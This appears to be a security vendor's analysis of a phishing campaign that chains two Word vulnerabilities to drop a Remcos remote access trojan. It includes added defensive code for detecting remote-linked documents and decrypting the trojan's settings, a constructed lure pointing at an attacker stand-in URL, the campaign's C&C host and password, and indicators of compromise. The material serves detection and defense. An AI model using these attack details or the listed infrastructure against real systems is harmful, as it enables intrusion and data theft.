Emails containing malicious attachments equipped with keyloggers and screen capture capabilities are targeting businesses worldwide, with noted attacks in Asia, Russia, and the Middle East. The campaign is designed to look like it comes from real affiliates and employees working for a well-known pharmaceutical distributor in order to make the emails more convincing and lure the recipients into opening the attached document.
Cyren detects and blocks this threat as XML/CVE170199, CVE-2017-8759!Camelot, W32/TinyDL.A and W32/Rescoms.G.
How It Works
An email arrives from what appears to be a reputable person and company in the pharmaceutical industry containing an attachment that looks like an invoice or statement.
Figure 1: Email Sample
To initiate the installation of the main malware, the attack first exploits the Microsoft vulnerability CVE-2017-0199 so that Word automatically updates the document with malicious content at open time; in this case the linked content is a file named “free.doc”, fetched directly from the threat actor’s server.
Figure 2: CVE-2017-0199 exploit automatically updates using “free.doc” directly from the threat actor’s server.
Figure 3: MS Word prompts the user to update the document from linked files.
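The CVE-2017-0199 stage above works because Word resolves an external link relationship in the document at open time and fetches whatever the relationship points at. A .docx is a zip archive, and every part's relationships live in a `*.rels` XML file, so a cheap triage or mail-gateway check is to scan those files for external, non-hyperlink relationships whose target is a network location. The following is an added example (not Cyren's code, and not the campaign's document); the sample document, the `attacker.example` URL and the file names in it are constructed for the demonstration, and the check covers OOXML (.docx) only, not the legacy binary .doc format.

```python
"""Flag external link relationships in a .docx that Word would resolve at open.

Added example, not code from the original article. The sample documents built
by build_sample_docx() are constructed for this demonstration.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
# Targets that make Word reach out over the network (or a UNC path) at open time.
REMOTE_TARGET = re.compile(r"^(https?://|ftp://|file://|\\\\)", re.IGNORECASE)


def find_remote_links(docx_bytes: bytes) -> list:
    """Return every external, non-hyperlink relationship with a remote target.

    Each hit is {"part": <rels file>, "type": <short rel type>, "target": <url>}.
    Ordinary hyperlinks are skipped: they are only fetched when the user clicks.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue  # internal parts never leave the archive
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                if rel_type == "hyperlink":
                    continue
                if REMOTE_TARGET.match(target):
                    hits.append({"part": name, "type": rel_type, "target": target})
    return hits


def build_sample_docx(target: str, rel_type: str = "oleObject") -> bytes:
    """Build a minimal (constructed) .docx carrying one external relationship.

    rel_type="oleObject" mimics a linked object updated at open; "hyperlink"
    produces a benign document for comparison.
    """
    attr_target = escape(target, {'"': "&quot;"})
    pkg_rels = (
        f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}/officeDocument" '
        f'Target="word/document.xml"/></Relationships>'
    )
    doc_rels = (
        f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}/{rel_type}" '
        f'Target="{attr_target}" TargetMode="External"/></Relationships>'
    )
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        "<w:body><w:p><w:r><w:t>Invoice</w:t></w:r></w:p></w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("_rels/.rels", pkg_rels)
        zf.writestr("word/document.xml", document)
        zf.writestr("word/_rels/document.xml.rels", doc_rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed lure: a linked object that pulls a second-stage document.
    lure = build_sample_docx("http://attacker.example/free.doc")
    for hit in find_remote_links(lure):
        print(f"{hit['part']}: {hit['type']} -> {hit['target']}")
    # Constructed benign document: a plain hyperlink produces no hit.
    print(find_remote_links(build_sample_docx("https://example.com/", "hyperlink")))
```

The check is intentionally narrow: it reports only relationships Word resolves on its own, so a clean document with ordinary clickable links produces no hits, while any `oleObject` (or other non-hyperlink) relationship pointing at an HTTP, FTP, `file://` or UNC target is reported together with the part it was found in.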
The downloaded document contains a linked document object (with hidden text) that, when executed, exploits a second vulnerability, CVE-2017-8759, in MS Office’s SOAP WSDL parser.
Figure 4: Hidden linked document object
Figure 5: CVE-2017-8759 Exploit
The CVE-2017-8759 exploit runs .NET code, which drops and installs an executable binary in the Windows temporary directory. This file (which Cyren detects as W32/TinyDL.A) downloads the main malware component and saves it as %LOCALAPPDATA%\avast.exe. Cyren detects the main malware component as W32/Rescoms.G.
Strings in the dumped backdoor payload suggest that it is a variant of the Remcos RAT. Examining the latest free version of this Remote Access Trojan shows the capabilities it offers on an infected system.
Figure 6: Builder Options
Figure 7: Installation Options
Figure 8: Process Injection and Sandbox Detection Options
Figure 9: Keylogging Options
Figure 10: Screen Capture Options
Figure 11: Remote Options
Digging deeper into the backdoor payload, we find its settings in the resource section of the file.
Figure 11: The first byte is the size of the RC4 key, and the key itself follows it.
This version still uses RC4 encryption. Once the settings are decrypted, they show that the backdoor will try to connect to the following remote host, using “pass” as the password.
C&C: infocolornido.publicvm.com
Port: 2404
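The resource layout just described (a length byte, the RC4 key, then the encrypted settings) is enough to write a small configuration extractor for triage. The block below is an added example, not Cyren's tooling or the malware's code. It implements RC4 from scratch and assumes only what the article states about the blob; the settings field layout it parses (`host:port|password`) and the sample blob it decodes are constructed for the demonstration and are not the real Remcos configuration format, although the host, port and password values are the ones reported above.

```python
"""Extract the RC4-protected settings blob described in the article.

Added example, not code from the original article. The field layout
(host:port|password) and build_sample_blob() are constructed for the demo.
"""


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):  # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_settings(blob: bytes) -> bytes:
    """Return the decrypted settings from a resource laid out as
    [key length (1 byte)][RC4 key][RC4-encrypted settings]."""
    if not blob:
        raise ValueError("empty resource")
    key_len = blob[0]
    if key_len == 0 or len(blob) < 1 + key_len + 1:
        raise ValueError("resource too short for the declared key length")
    key = blob[1:1 + key_len]
    return rc4(key, blob[1 + key_len:])


def parse_settings(plaintext: bytes) -> dict:
    """Split the (constructed) 'host:port|password' layout into a dict."""
    fields = plaintext.split(b"|")
    if len(fields) < 2 or b":" not in fields[0]:
        raise ValueError("unexpected settings layout")
    host, port = fields[0].rsplit(b":", 1)
    return {
        "host": host.decode("ascii"),
        "port": int(port),
        "password": fields[1].decode("ascii"),
    }


def extract_config(blob: bytes) -> dict:
    """Decrypt the resource blob and parse the C&C settings out of it."""
    return parse_settings(decrypt_settings(blob))


def build_sample_blob(key: bytes, settings: bytes) -> bytes:
    """Constructed sample resource with the article's layout (for testing)."""
    if not 0 < len(key) < 256:
        raise ValueError("key length must fit in one byte")
    return bytes([len(key)]) + key + rc4(key, settings)


if __name__ == "__main__":
    # Constructed blob using the values reported in the article.
    sample = build_sample_blob(b"demo-key", b"infocolornido.publicvm.com:2404|pass")
    print(extract_config(sample))
```

Because the key travels with the ciphertext, no secret is needed to recover the settings; the extractor simply trusts the length byte, so the bounds check in `decrypt_settings` is what keeps a truncated or corrupt resource from being silently misdecoded.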
With malware exploding around the globe, it is critical that companies put essential steps in place to protect from new and existing threats.
Cloud-based Email and Web Security
It is common for threat actors to use recently disclosed and patched vulnerabilities, since they know that companies are often slow to update and apply patches across their networks.
The attack takes advantage of two known vulnerabilities that Microsoft has identified and provided fixes for. Updating software and applying patches is a critical step in safeguarding your networks.
In addition to cloud-based security and system patches, another option in this kind of threat scenario is to disable the “Update automatic links at open” function, a mitigation also used successfully against the recent DDE vulnerability. (Please note that we only tested it on Microsoft Word 2016.)
File -> Options -> Advanced -> General -> uncheck “Update automatic links at open”.
Indicators of Compromise
E-mail subject: Payment confirmation attached.
E-mail subject: Payment confirmation attached
Filename: Nov Payment.docx (XML/CVE170199)
Link to CVE-2017-8759 exploit
Link to CVE-2017-8759 payload
Filename: xin.png (XML/DropExe.A)
Filename: TMP<random>.exe (W32/TinyDL.A)
Filename: avast.exe (W32/Rescoms.G)
Filename: whmpqn.doc (CVE-2017-8759!Camelot)
Filename: epraeb (CVE178759)
Filename: usa.exe (W32/Injector.GAV)